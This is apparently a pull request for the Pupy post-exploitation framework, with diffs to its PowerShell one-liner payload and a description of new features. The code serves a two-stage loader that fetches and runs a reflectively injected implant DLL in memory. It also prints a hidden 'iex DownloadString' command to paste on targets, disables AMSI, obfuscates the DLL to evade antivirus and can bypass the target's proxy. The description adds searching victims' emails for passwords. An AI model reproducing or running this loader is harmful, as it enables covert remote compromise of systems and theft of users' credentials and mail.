-        link_ip=conf["launcher_args"][i].split(":",1)[0]
-        serve_ps1_payload(conf, link_ip=link_ip)
+        link_ip=conf["launcher_args"][conf["launcher_args"].index("--host")+1].split(":",1)[0]
+        if args.no_use_proxy == True:
+            serve_ps1_payload(conf, link_ip=link_ip, port=args.ps1_oneliner_listen_port, useTargetProxy=False)
+        else:
+            serve_ps1_payload(conf, link_ip=link_ip, port=args.ps1_oneliner_listen_port, useTargetProxy=True)
     elif args.format=="rubber_ducky":
         rubber_ducky(conf).generateAllForOStarget()
     else:

--- a/pupy/pupylib/payloads/ps1_oneliner.py
+++ b/pupy/pupylib/payloads/ps1_oneliner.py
@@ -19,31 +19,32 @@ ROOT=os.path.abspath(os.path.join(os.path.dirname(__file__),"..",".."))
 
 #url_random_one = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(5))
 #url_random_two = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(5))
-### url_random_one and url_random_two variables are fixed because if you break you ps1_neliner listener, the payload will be not be able to get stages -:(
+
+### "url_random_one" and "url_random_two" variables are fixed because if you break you ps1_listener listener, the ps1_listener payload will not be able to get stages -:(
 url_random_one = "eiloShaegae1"
 url_random_two = "IMo8oosieVai"
 
 def getInvokeReflectivePEInjectionWithDLLEmbedded(payload_conf):
-	'''
-	Return source code of InvokeReflectivePEInjection.ps1 script with pupy dll embedded
-	Ready for executing
-	'''
-	SPLIT_SIZE = 100000
-	x64InitCode, x86InitCode, x64ConcatCode, x86ConcatCode = "", "", "", ""
-	code = """
-	$PEBytes = ""
-	{0}
-	$PEBytesTotal = [System.Convert]::FromBase64String({1})
-	Invoke-ReflectivePEInjection -PEBytes $PEBytesTotal -ForceASLR
-	"""#{1}=x86dll
-	binaryX86=b64encode(get_edit_pupyx86_dll(payload_conf))
-	binaryX86parts = [binaryX86[i:i+SPLIT_SIZE] for i in range(0, len(binaryX86), SPLIT_SIZE)]
-	for i,aPart in enumerate(binaryX86parts):
-		x86InitCode += "$PEBytes{0}=\"{1}\"\n".format(i,aPart)
-		x86ConcatCode += "$PEBytes{0}+".format(i)
-	print(colorize("[+] ","green")+"X86 pupy dll loaded and {0} variables generated".format(i+1))
-	script = obfuscatePowershellScript(open(os.path.join(ROOT, "external", "PowerSploit", "CodeExecution", "Invoke-ReflectivePEInjection.ps1"), 'r').read())
-	return obfs_ps_script("{0}\n{1}".format(script, code.format(x86InitCode, x86ConcatCode[:-1])))
+    '''
+    Return source code of InvokeReflectivePEInjection.ps1 script with pupy dll embedded
+    Ready for executing
+    '''
+    SPLIT_SIZE = 100000
+    x64InitCode, x86InitCode, x64ConcatCode, x86ConcatCode = "", "", "", ""
+    code = """
+    $PEBytes = ""
+    {0}
+    $PEBytesTotal = [System.Convert]::FromBase64String({1})
+    Invoke-ReflectivePEInjection -PEBytes $PEBytesTotal -ForceASLR
+    """#{1}=x86dll
+    binaryX86=b64encode(get_edit_pupyx86_dll(payload_conf))
+    binaryX86parts = [binaryX86[i:i+SPLIT_SIZE] for i in range(0, len(binaryX86), SPLIT_SIZE)]
+    for i,aPart in enumerate(binaryX86parts):
+        x86InitCode += "$PEBytes{0}=\"{1}\"\n".format(i,aPart)
+        x86ConcatCode += "$PEBytes{0}+".format(i)
+    print(colorize("[+] ","green")+"X86 pupy dll loaded and {0} variables generated".format(i+1))
+    script = obfuscatePowershellScript(open(os.path.join(ROOT, "external", "PowerSploit", "CodeExecution", "Invoke-ReflectivePEInjection.ps1"), 'r').read())
+    return obfs_ps_script("{0}\n{1}".format(script, code.format(x86InitCode, x86ConcatCode[:-1])))
 
 def create_ps_command(ps_command, force_ps32=False, nothidden=False):
     ps_command = """[Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}};
@@ -88,9 +89,16 @@ class PupyPayloadHTTPHandler(BaseHTTPRequestHandler):
             self.send_response(200)
             self.send_header('Content-type','text/html')
             self.end_headers()
-
-            launcher = """
-            IEX (New-Object Net.WebClient).DownloadString('http://{server}:{port}/{url_random_two}');""".format(  
+            if self.server.useTargetProxy == True:
+                print colorize("[+] ","green")+"Stage 1 configured for using target's proxy configuration"
+                launcher = """IEX (New-Object Net.WebClient).DownloadString('http://{server}:{port}/{url_random_two}');""".format(  
+                                                                                server=self.server.link_ip,
+                                                                                port=self.server.link_port,
+                                                                                url_random_two=url_random_two
+                                                                            )
+            else:
+                print colorize("[+] ","green")+"Stage 1 configured for NOT using target's proxy configuration"
+                launcher = """$w=(New-Object System.Net.WebClient);$w.Proxy=[System.Net.GlobalProxySelection]::GetEmptyWebProxy();iex($w.DownloadString('http://{server}:{port}/{url_random_two}'));""".format(  
                                                                                 server=self.server.link_ip,
                                                                                 port=self.server.link_port,
                                                                                 url_random_two=url_random_two
@@ -115,12 +123,13 @@ class PupyPayloadHTTPHandler(BaseHTTPRequestHandler):
             return
 
 class ps1_HTTPServer(HTTPServer):
-    def __init__(self, server_address, conf, link_ip, link_port, ssl):
+    def __init__(self, server_address, conf, link_ip, link_port, ssl, useTargetProxy):
         self.payload_conf = conf
         self.link_ip=link_ip
         self.link_port=link_port
         self.aes_key=''.join([random.choice(string.ascii_lowercase+string.ascii_uppercase+string.digits) for _ in range(0,16)]) # must be 16 char long for aes 128
         self.random_reflectivepeinj_name=''.join([random.choice(string.ascii_lowercase+string.ascii_uppercase+string.digits) for _ in range(0,random.randint(8,12))]) # must be 16 char long for aes 128
+        self.useTargetProxy = useTargetProxy
         HTTPServer.__init__(self, server_address, PupyPayloadHTTPHandler)
         if ssl:
             config = configparser.ConfigParser()
@@ -129,11 +138,11 @@ class ps1_HTTPServer(HTTPServer):
             certfile=config.get("pupyd","certfile").replace("\\",os.sep).replace("/",os.sep)
             self.socket = wrap_socket (self.socket, certfile=certfile, keyfile=keyfile, server_side=True)
 
-def serve_ps1_payload(conf, ip="0.0.0.0", port=8080, link_ip="<your_ip>", ssl=False):
+def serve_ps1_payload(conf, ip="0.0.0.0", port=8080, link_ip="<your_ip>", ssl=False, useTargetProxy=True):
     try:
         while True:
             try:
-                server = ps1_HTTPServer((ip, port), conf, link_ip, port, ssl)
+                server = ps1_HTTPServer((ip, port), conf, link_ip, port, ssl, useTargetProxy)
                 break
             except Exception as e:
                 # [Errno 98] Adress already in use
@@ -143,10 +152,15 @@ def serve_ps1_payload(conf, ip="0.0.0.0", port=8080, link_ip="<your_ip>", ssl=Fa
                     raise
         print colorize("[+] ","green")+"copy/paste this one-line loader to deploy pupy without writing on the disk :"
         print " --- "
-        oneliner=colorize("powershell.exe -w hidden -noni -nop -c \"iex(New-Object System.Net.WebClient).DownloadString('http://%s:%s/%s')\""%(link_ip, port, url_random_one), "green")
-        # This line could work check when proxy is used (have to be tested)
-        # oneliner=colorize("powershell.exe -w hidden -noni -nop -c $K=new-object net.webclient;$K.proxy=[Net.WebRequest]::GetSystemWebProxy();$K.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $K.downloadstring('http://%s:%s/pa')"%(link_ip, port), "green")
+        if useTargetProxy == True:
+            oneliner=colorize("powershell.exe -w hidden -noni -nop -c \"iex(New-Object System.Net.WebClient).DownloadString('http://%s:%s/%s')\""%(link_ip, port, url_random_one), "green")
+            message=colorize("Please note that if the target's system uses a proxy, this previous powershell command will download/execute pupy through the proxy", "yellow")
+        else:
+            oneliner=colorize("powershell.exe -w hidden -noni -nop -c \"$w=(New-Object System.Net.WebClient);$w.Proxy=[System.Net.GlobalProxySelection]::GetEmptyWebProxy();iex($w.DownloadString('http://%s:%s/%s'));\""%(link_ip, port, url_random_one), "green")
+            message= colorize("Please note that even if the target's system uses a proxy, this previous powershell command will not use the proxy for downloading pupy", "yellow")
         print oneliner
+        print " --- "
+        print message
         print " --- "
 
         print colorize("[+] ","green")+'Started http server on %s:%s '%(ip, port)

--- a/pupy/pupylib/payloads/ps1_oneliner.py
+++ b/pupy/pupylib/payloads/ps1_oneliner.py
@@ -2,104 +2,113 @@
 # -*- coding: UTF8 -*-
 from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
 import os.path
-import base64
 from pupylib.utils.term import colorize
-import textwrap
 import random, string
-import time
-from pupygen import get_edit_pupyx86_dll, get_edit_pupyx64_dll 
+from pupygen import get_edit_pupyx86_dll
 try:
     import ConfigParser as configparser
 except ImportError:
     import configparser
 from ssl import wrap_socket
+from base64 import b64encode
+import re
+
+from modules.lib.windows.powershell_upload import obfuscatePowershellScript, obfs_ps_script
 
 ROOT=os.path.abspath(os.path.join(os.path.dirname(__file__),"..",".."))
 
-def pad(s):
-    """
-    Performs PKCS#7 padding for 128 bit block size.
-    """
-    return str(s) + chr(16 - len(str(s)) % 16) * (16 - len(str(s)) % 16) 
+#url_random_one = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(5))
+#url_random_two = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(5))
+### url_random_one and url_random_two variables are fixed because if you break you ps1_neliner listener, the payload will be not be able to get stages -:(
+url_random_one = "eiloShaegae1"
+url_random_two = "IMo8oosieVai"
 
-from Crypto.Cipher import AES
-def aes_encrypt(data, key):
-    IV="\x00"*16
-    cipher = AES.new(key, AES.MODE_CBC, IV)
-    return cipher.encrypt(pad(data))
+def getInvokeReflectivePEInjectionWithDLLEmbedded(payload_conf):
+	'''
+	Return source code of InvokeReflectivePEInjection.ps1 script with pupy dll embedded
+	Ready for executing
+	'''
+	SPLIT_SIZE = 100000
+	x64InitCode, x86InitCode, x64ConcatCode, x86ConcatCode = "", "", "", ""
+	code = """
+	$PEBytes = ""
+	{0}
+	$PEBytesTotal = [System.Convert]::FromBase64String({1})
+	Invoke-ReflectivePEInjection -PEBytes $PEBytesTotal -ForceASLR
+	"""#{1}=x86dll
+	binaryX86=b64encode(get_edit_pupyx86_dll(payload_conf))
+	binaryX86parts = [binaryX86[i:i+SPLIT_SIZE] for i in range(0, len(binaryX86), SPLIT_SIZE)]
+	for i,aPart in enumerate(binaryX86parts):
+		x86InitCode += "$PEBytes{0}=\"{1}\"\n".format(i,aPart)
+		x86ConcatCode += "$PEBytes{0}+".format(i)
+	print(colorize("[+] ","green")+"X86 pupy dll loaded and {0} variables generated".format(i+1))
+	script = obfuscatePowershellScript(open(os.path.join(ROOT, "external", "PowerSploit", "CodeExecution", "Invoke-ReflectivePEInjection.ps1"), 'r').read())
+	return obfs_ps_script("{0}\n{1}".format(script, code.format(x86InitCode, x86ConcatCode[:-1])))
 
+def create_ps_command(ps_command, force_ps32=False, nothidden=False):
+    ps_command = """[Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}};
+    try{{ 
+    [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true)
+    }}catch{{}}
+    {}
+    """.format(ps_command)
 
-PS1_DECRYPT="""
-[Reflection.Assembly]::LoadWithPartialName("System.Security")
-function AES-Decrypt($Encrypted, $Passphrase) 
-{ 
-    $AES=New-Object System.Security.Cryptography.AesCryptoServiceProvider
-    $IV = New-Object Byte[] 16
-    $AES.Mode="CBC"
-    $AES.KeySize=128
-    $AES.Key=[Text.Encoding]::ASCII.GetBytes($Passphrase)
-    $AES.IV = $IV
-    $AES.Padding = "None"
-    $d = $AES.CreateDecryptor()
-    $ms = new-Object IO.MemoryStream @(,$Encrypted)
-    $cs = new-Object Security.Cryptography.CryptoStream $ms,$d,"Read"
-    $count = $cs.Read($Encrypted, 0, $Encrypted.Length)
-    $cs.Close()
-    $ms.Close()
-    $AES.Clear()
-    $Encrypted[0..($Encrypted.Length - $Encrypted[-1] - 1)]
-} 
-"""
+    if force_ps32:
+        command = """$command = '{}'
+        if ($Env:PROCESSOR_ARCHITECTURE -eq 'AMD64') 
+        {{
+            
+            $exec = $Env:windir + '\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -exec bypass -window hidden -noni -nop -encoded ' + $command
+            IEX $exec
+        }}
+        else
+        {{
+            $exec = [System.Convert]::FromBase64String($command)
+            $exec = [Text.Encoding]::Unicode.GetString($exec)
+            IEX $exec
+        }}""".format(b64encode(ps_command.encode('UTF-16LE')))
+        
+        if nothidden is True:
+            command = 'powershell.exe -exec bypass -window maximized -encoded {}'.format(b64encode(command.encode('UTF-16LE')))
+        else:
+            command = 'powershell.exe -exec bypass -window hidden -noni -nop -encoded {}'.format(b64encode(command.encode('UTF-16LE')))
+
+    elif not force_ps32:
+        if nothidden is True:
+            command = 'powershell.exe -exec bypass -window maximized -encoded {}'.format(b64encode(ps_command.encode('UTF-16LE')))
+        else:
+            command = 'powershell.exe -exec bypass -window hidden -noni -nop -encoded {}'.format(b64encode(ps_command.encode('UTF-16LE')))
+
+    return command
 
 class PupyPayloadHTTPHandler(BaseHTTPRequestHandler):
     def do_GET(self):
-        if self.path=="/p":
+        # print self.server.random_reflectivepeinj_name
+        if self.path=="/%s" % url_random_one:
             self.send_response(200)
             self.send_header('Content-type','text/html')
             self.end_headers()
-            pe_bootloader=PS1_DECRYPT+"\n"+(textwrap.dedent("""
-            $p="%s"
-            $rpi=(((New-Object System.Net.WebClient).DownloadData("http://%s:%s/rpi")))
-            $path="b64"
-            if ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -ne 8){$path="b32"}
-            $raw=([Byte[]]((New-Object System.Net.WebClient).DownloadData("http://%s:%s/"+$path)))
-            iex([System.Text.Encoding]::UTF8.GetString( (AES-Decrypt $rpi $p)))
-            Write-Output "DLL received"
-            $raw=AES-Decrypt $raw $p
-            Write-Output "Reflective DLL decrypted"
-            [GC]::Collect()
-            %s -ForceASLR -PEBytes $raw #-Verbose
-            """%(self.server.aes_key, self.server.link_ip, self.server.link_port, self.server.link_ip, self.server.link_port, self.server.random_reflectivepeinj_name)))
-            self.wfile.write(pe_bootloader)
-            print colorize("[+] ","green")+" powershell script stage1 served !"
 
-        elif self.path=="/rpi":
-            #serve the powershell script
+            launcher = """
+            IEX (New-Object Net.WebClient).DownloadString('http://{server}:{port}/{url_random_two}');""".format(  
+                                                                                server=self.server.link_ip,
+                                                                                port=self.server.link_port,
+                                                                                url_random_two=url_random_two
+                                                                            )
+            launcher = create_ps_command(launcher, force_ps32=True, nothidden=False)
+            self.wfile.write(launcher)
+            print colorize("[+] ","green")+"[Stage 1/2] Powershell script served !"
+        
+        elif self.path=="/%s" % url_random_two:
             self.send_response(200)
-            #self.send_header('Content-type','text/html')
             self.send_header('Content-type','application/octet-stream')
             self.end_headers()
             code=open(os.path.join(ROOT, "external", "PowerSploit", "CodeExecution", "Invoke-ReflectivePEInjection.ps1"), 'r').read()
             code=code.replace("Invoke-ReflectivePEInjection", self.server.random_reflectivepeinj_name) # seems to bypass some av like avast :o)
-            d=aes_encrypt(code, self.server.aes_key)
-            self.wfile.write(d)
-            print colorize("[+] ","green")+" powershell Invoke-ReflectivePEInjection.ps1 script served !"
-        elif self.path=="/b32":
-            #serve the pupy 32bits dll to load from memory
-            self.send_response(200)
-            self.send_header('Content-type','application/octet-stream')
-            self.end_headers()
-            print colorize("[+] ","green")+" generating x86 reflective dll ..."
-            self.wfile.write(aes_encrypt(get_edit_pupyx86_dll(self.server.payload_conf), self.server.aes_key))
-            print colorize("[+] ","green")+" pupy x86 reflective dll served !"
-        elif self.path=="/b64":
-            #serve the pupy 64bits dll to load from memory
-            self.send_response(200)
-            self.send_header('Content-type','application/octet-stream')
-            self.end_headers()
-            print colorize("[+] ","green")+" generating amd64 reflective dll ..."
-            self.wfile.write(aes_encrypt(get_edit_pupyx64_dll(self.server.payload_conf), self.server.aes_key))
-            print colorize("[+] ","green")+" pupy amd64 reflective dll served !"
+            self.wfile.write(getInvokeReflectivePEInjectionWithDLLEmbedded(self.server.payload_conf))
+            print colorize("[+] ","green")+"[Stage 2/2] Powershell Invoke-ReflectivePEInjection script (with dll embedded) served!"
+            print colorize("[+] ","green")+"You should have a pupy shell in few seconds from this host..."
+
         else:
             self.send_response(404)
             self.end_headers()
@@ -134,7 +143,9 @@ def serve_ps1_payload(conf, ip="0.0.0.0", port=8080, link_ip="<your_ip>", ssl=Fa
                     raise
         print colorize("[+] ","green")+"copy/paste this one-line loader to deploy pupy without writing on the disk :"
         print " --- "
-        oneliner=colorize("powershell.exe -w hidden -noni -nop -c \"iex(New-Object System.Net.WebClient).DownloadString('http://%s:%s/p')\""%(link_ip, port), "green")
+        oneliner=colorize("powershell.exe -w hidden -noni -nop -c \"iex(New-Object System.Net.WebClient).DownloadString('http://%s:%s/%s')\""%(link_ip, port, url_random_one), "green")
+        # This line could work check when proxy is used (have to be tested)
+        # oneliner=colorize("powershell.exe -w hidden -noni -nop -c $K=new-object net.webclient;$K.proxy=[Net.WebRequest]::GetSystemWebProxy();$K.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $K.downloadstring('http://%s:%s/pa')"%(link_ip, port), "green")
         print oneliner
         print " --- "
 


### PR DESCRIPTION
Improvements in Outlook module:
- Bug fix in "Get Outlook configuration" option.
- **Search strings in emails** (ex: password). Of course, this option can be used for getting subjects and bodies (only) of all emails. 

Improvements in port_scan module:
- Timeout option

Improvements in ps1_oneliner payload (based on @AlessandroZ's commits f934a907f753d5079e187d12f504276f0089a159, these commits are not accepted yet):
- Avoid AV detection. DLL is detected by AV when downloaded on target's system in f934a907f753d5079e187d12f504276f0089a159. Now, the pupy dll is randomly splitted, encoded and embedded in Invoke-ReflectivePEInjection.ps1 script. 2 stages now, not 3.
- If you want to use ps1_oneliner without using the target's proxy configuration (ex: you are in the same internal network while the target is using the company's proxy), you can't with the current version of pupy. Thanks to the commit b86d0ba4e0ef48122ffb4bc5aba15b9ceee584b8, the user can generate a ps1_oneliner payload that will not use the target's proxy configuration to get stages (see **_--no-use-proxy_** option).
- The _**--ps1-oneliner-listen-port**_ option has been appended for choosing the ps1_oneliner local listening port.

New module named **privesc_checker** for Linux:
- Run Lineum.sh on the target (see [privesc_checker](https://github.com/rebootuser/LinEnum) for tests done)